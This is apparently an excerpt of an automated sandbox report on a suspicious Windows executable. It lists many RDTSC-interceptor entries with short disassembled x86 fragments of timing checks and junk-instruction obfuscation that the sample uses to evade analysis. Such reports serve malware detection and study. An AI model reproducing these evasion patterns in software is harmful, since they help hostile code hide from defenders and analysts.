                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2B9D40 second address: 2B9D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8080FFFC56h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BA456 second address: 2BA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BA45A second address: 2BA468 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F8080FFFC66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BA468 second address: 2BA498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080B8A77Ah 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F8080B8A78Fh 0x00000012 jmp 00007F8080B8A789h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BA763 second address: 2BA77A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8080FFFC61h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BA77A second address: 2BA7B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A787h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b jmp 00007F8080B8A77Fh 0x00000010 jns 00007F8080B8A776h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BA7B3 second address: 2BA7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BA7B9 second address: 2BA7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2AEAD1 second address: 2AEAD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BAE1F second address: 2BAE24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BAF57 second address: 2BAF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080FFFC5Fh 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BAF6B second address: 2BAF7B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8080B8A782h 0x00000008 jp 00007F8080B8A776h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BB0AE second address: 2BB0C5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8080FFFC56h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BB0C5 second address: 2BB0D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BB0D0 second address: 2BB0ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8080FFFC68h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BB48B second address: 2BB49B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F8080B8A776h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 28C0F8 second address: 28C10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F8080FFFC5Dh 0x0000000d pop ecx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C0923 second address: 2C0946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A780h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F8080B8A776h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C0946 second address: 2C0961 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8080FFFC63h 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BF7D7 second address: 2BF7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F8080B8A778h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BFF9B second address: 2BFF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BFF9F second address: 2BFFC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8080B8A783h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2BFFC0 second address: 2BFFDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C55DE second address: 2C55F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A783h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C4E65 second address: 2C4EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC63h 0x00000007 jmp 00007F8080FFFC5Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F8080FFFC62h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jg 00007F8080FFFC56h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C4EAB second address: 2C4EBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F8080B8A776h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C5156 second address: 2C515C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C8C9F second address: 2C8CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C8CA5 second address: 2C8CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C8CAA second address: 2C8CB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C8EBC second address: 2C8EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8080FFFC68h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C8EE0 second address: 2C8EE6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C9603 second address: 2C964A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8080FFFC63h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jno 00007F8080FFFC69h 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8080FFFC5Ch 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C964A second address: 2C9654 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C9654 second address: 2C9664 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8080FFFC5Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C9B9E second address: 2C9BF9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8080B8A787h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8080B8A778h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 adc edi, 62575A28h 0x0000002d mov si, 3A8Fh 0x00000031 xchg eax, ebx 0x00000032 ja 00007F8080B8A77Ah 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push esi 0x0000003c pop esi 0x0000003d pop eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C9BF9 second address: 2C9BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CA193 second address: 2CA197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CA197 second address: 2CA19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CAB21 second address: 2CAB27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CAB27 second address: 2CAB39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jbe 00007F8080FFFC5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CAB39 second address: 2CAB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CAB40 second address: 2CAB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 add dword ptr [ebp+122D1FEEh], edx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F8080FFFC58h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 pushad 0x0000002a mov al, dh 0x0000002c adc edi, 2D637D0Ah 0x00000032 popad 0x00000033 mov dword ptr [ebp+122D1F9Fh], edi 0x00000039 push 00000000h 0x0000003b xor edi, 565CBD61h 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 jbe 00007F8080FFFC5Ch 0x0000004a jno 00007F8080FFFC56h 0x00000050 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CB331 second address: 2CB335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CB335 second address: 2CB339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CD0E4 second address: 2CD0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jp 00007F8080B8A77Ch 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CD0FC second address: 2CD166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F8080FFFC58h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 or edi, dword ptr [ebp+122D2C7Fh] 0x00000027 push 00000000h 0x00000029 jmp 00007F8080FFFC5Eh 0x0000002e push 00000000h 0x00000030 mov edi, 09A9340Ah 0x00000035 push eax 0x00000036 jl 00007F8080FFFC76h 0x0000003c pushad 0x0000003d jmp 00007F8080FFFC68h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CECA7 second address: 2CECAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CECAC second address: 2CECB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8080FFFC56h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CF269 second address: 2CF285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A788h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CF285 second address: 2CF2B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8080FFFC5Dh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F8080FFFC85h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8080FFFC64h 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CFDB3 second address: 2CFE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnc 00007F8080B8A776h 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 mov dword ptr [ebp+122D2120h], ebx 0x00000017 mov edi, 3CEA03AEh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F8080B8A778h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 sub dword ptr [ebp+122D1999h], esi 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F8080B8A778h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000018h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a mov esi, dword ptr [ebp+122D2AD7h] 0x00000060 xchg eax, ebx 0x00000061 jmp 00007F8080B8A783h 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F8080B8A784h 0x0000006e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D2566 second address: 2D256C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D256C second address: 2D2570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D2570 second address: 2D257E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D444B second address: 2D444F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D75B2 second address: 2D7626 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8080FFFC5Fh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F8080FFFC58h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D1C32h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F8080FFFC58h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c push 00000000h 0x0000004e add bh, FFFFFFC5h 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 push edi 0x00000056 pop edi 0x00000057 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2D7626 second address: 2D7634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F8080B8A776h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DA33F second address: 2DA344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DA344 second address: 2DA351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DB4CA second address: 2DB4D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DC43C second address: 2DC441 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DC441 second address: 2DC4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, 688D3220h 0x0000000f or edi, dword ptr [ebp+122D2C9Fh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F8080FFFC58h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D3221h], ebx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F8080FFFC58h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push edx 0x00000058 pop edx 0x00000059 jmp 00007F8080FFFC67h 0x0000005e popad 0x0000005f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DC4C5 second address: 2DC4CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DE5B5 second address: 2DE5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DE5BB second address: 2DE5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DE5C0 second address: 2DE5CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F8080FFFC56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2DF68A second address: 2DF6A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080B8A783h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E05AF second address: 2E061E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007F8080FFFC56h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f adc di, E90Dh 0x00000014 jmp 00007F8080FFFC5Ch 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F8080FFFC58h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F8080FFFC58h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 sub dword ptr [ebp+122D1A08h], ebx 0x00000057 xchg eax, esi 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E061E second address: 2E0622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E0622 second address: 2E0643 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007F8080FFFC5Ch 0x00000013 pop edi 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E5827 second address: 2E582B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E582B second address: 2E5831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2E5831 second address: 2E5835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
